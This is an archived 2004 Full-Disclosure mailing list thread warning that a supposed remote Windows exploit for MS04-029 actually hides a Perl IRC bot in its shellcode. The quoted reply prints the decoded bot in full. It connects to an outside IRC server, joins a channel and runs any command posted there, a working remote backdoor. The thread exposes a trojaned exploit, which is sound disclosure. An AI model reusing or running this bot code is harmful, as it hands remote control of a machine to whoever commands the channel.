lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
From: toddtowles at brookshires.com (Todd Towles)
Subject: New Remote Windows Exploit (MS04-029)

Yep, Dave pointed that out really fast... 

> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com 
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of 
> Barrie Dempster
> Sent: Wednesday, November 03, 2004 3:19 PM
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
> 
> 
> Excellent exploit, I'm sure no one will spot that perl IRC 
> bot in there, nope no one will see that...
> 
> (hint for the readers, try looking at the ascii out put of 
> the "char *shellcode_payload=" data, looks a little like the 
> following....)
> 
> [code]
> #!/usr/bin/perl
> $c
> han="#0x";$nick="k
> ";$server="ir3ip.n
> et";$SIG{TERM}={};
> exit if fork;use I
> O::Socket;$sock =
> IO::Socket::INET->
> new($server.":6667
> ")||exit;print $so
> ck "USER k +i k :k
> v1\nNICK k\n";$i=1
> ;while(<$sock>=~/^
> [^ ]+ ([^ ]+) /){$
> mode=$1;last if $m
> ode=="001";if($mod
> e=="433"){$i++;$ni
> ck=~s/\d*$/$i/;pri
> nt $sock "NICK $ni
> ck\n";}}print $soc
> k "JOIN $chan\nPRI
> VMSG $chan :Hi\n";
> while(<$sock>){if
> (/^PING (.*)$/){pr
> int $sock "PONG $1
> \nJOIN $chan\n";}i
> f(s/^[^ ]+ PRIVMSG
>  $chan :$nick[^ :\
> w]*:[^ :\w]* (.*)$
> /$1/){s/\s*$//;$_=
> `$_`;foreach(split
>  "\n"){print $sock
>  "PRIVMSG $chan :$
> _\n";sleep 1;}}}#/
> tmp/hi
> 
> [/code]
> 
> --
> Barrie Dempster (zeedo) - Fortiter et Strenue
> 
>   http://www.bsrf.org.uk
> 
> [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
> 
> 
> 
> 


Powered by blists - more mailing lists